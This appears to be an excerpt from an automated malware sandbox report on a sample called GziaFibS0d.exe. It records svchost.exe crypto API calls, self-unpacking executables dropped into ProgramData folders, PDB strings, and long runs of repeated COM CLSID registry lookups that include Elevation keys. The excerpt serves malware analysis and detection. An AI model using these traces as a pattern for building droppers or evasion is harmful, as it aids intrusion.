Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02B12F1A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	26_2_02B12F1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02B13E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	26_2_02B13E7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 28_2_02A52F1A CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	28_2_02A52F1A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 28_2_02A53E7E CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptImportKey,CryptVerifySignatureA,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,	28_2_02A53E7E

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\GziaFibS0d.exe	Unpacked PE file: 0.2.GziaFibS0d.exe.400000.0.unpack
Source: C:\ProgramData\{CF5104B8-9BB8-4B0C-8E6F-04A1D679738F}\rencz.exe	Unpacked PE file: 4.2.rencz.exe.400000.0.unpack
Source: C:\ProgramData\{D667E8A3-90A3-4407-AE7D-72E02EB22AAF}\tsuvgo.exe	Unpacked PE file: 6.2.tsuvgo.exe.400000.0.unpack
Source: C:\ProgramData\{DDA53BE8-33E8-48D8-9C7F-481456EC1549}\zipdk.exe	Unpacked PE file: 16.2.zipdk.exe.400000.0.unpack
Source: C:\ProgramData\{644E25B7-1AB7-434C-BD0A-D6B1CB215C97}\tfykdkdkdk.exe	Unpacked PE file: 18.2.tfykdkdkdk.exe.400000.0.unpack
Source: C:\ProgramData\{6B82AE99-8B99-4584-91C5-1F3FDB5B00DE}\ayxuiczvtsui.exe	Unpacked PE file: 20.2.ayxuiczvtsui.exe.400000.0.unpack
Source: C:\ProgramData\{73B44980-FF80-4C3E-8939-38EE139C8DB6}\ziczv.exe	Unpacked PE file: 22.2.ziczv.exe.400000.0.unpack
Source: C:\ProgramData\{7AA51DDD-2DDD-4155-A746-4633FBD41458}\uvtsuvts.exe	Unpacked PE file: 24.2.uvtsuvts.exe.400000.0.unpack
Source: C:\ProgramData\{812C3E65-7165-4977-8E9B-B83C3C084D5D}\czipqtsh.exe	Unpacked PE file: 27.2.czipqtsh.exe.400000.0.unpack

Source: GziaFibS0d.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: c:\Center\war\Soil\we\Summer\Wrong\Black\checkwork.pdb source: GziaFibS0d.exe, tsuvgo.exe.5.dr, uvtsuvts.exe.23.dr, czipqtsh.exe.26.dr, ayxuiczvtsui.exe.19.dr, rencz.exe.3.dr, ziczv.exe.21.dr, tfykdkdkdk.exe.17.dr, zipdk.exe.15.dr
Source:	Binary string: ntdll.pdb source: GziaFibS0d.exe, 00000000.00000003.1022750476.000000000261E000.00000004.00000020.00020000.00000000.sdmp, rencz.exe, 00000004.00000003.1250604560.0000000002529000.00000004.00000020.00020000.00000000.sdmp, tsuvgo.exe, 00000006.00000003.1477569101.00000000024FA000.00000004.00000020.00020000.00000000.sdmp, zipdk.exe, 00000010.00000003.1723834095.0000000002523000.00000004.00000020.00020000.00000000.sdmp, tfykdkdkdk.exe, 00000012.00000003.1951593792.0000000002528000.00000004.00000020.00020000.00000000.sdmp, ayxuiczvtsui.exe, 00000014.00000003.2217344590.0000000002764000.00000004.00000020.00020000.00000000.sdmp, ziczv.exe, 00000016.00000003.2450334827.0000000002502000.00000004.00000020.00020000.00000000.sdmp, uvtsuvts.exe, 00000018.00000003.2700926847.00000000025FC000.00000004.00000020.00020000.00000000.sdmp, czipqtsh.exe, 0000001B.00000003.2949868036.0000000002626000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: GziaFibS0d.exe, 00000000.00000003.1022750476.000000000261E000.00000004.00000020.00020000.00000000.sdmp, rencz.exe, 00000004.00000003.1250604560.0000000002529000.00000004.00000020.00020000.00000000.sdmp, tsuvgo.exe, 00000006.00000003.1477569101.00000000024FA000.00000004.00000020.00020000.00000000.sdmp, zipdk.exe, 00000010.00000003.1723834095.0000000002523000.00000004.00000020.00020000.00000000.sdmp, tfykdkdkdk.exe, 00000012.00000003.1951593792.0000000002528000.00000004.00000020.00020000.00000000.sdmp, ayxuiczvtsui.exe, 00000014.00000003.2217344590.0000000002764000.00000004.00000020.00020000.00000000.sdmp, ziczv.exe, 00000016.00000003.2450334827.0000000002502000.00000004.00000020.00020000.00000000.sdmp, uvtsuvts.exe, 00000018.00000003.2700926847.00000000025FC000.00000004.00000020.00020000.00000000.sdmp, czipqtsh.exe, 0000001B.00000003.2949868036.0000000002626000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
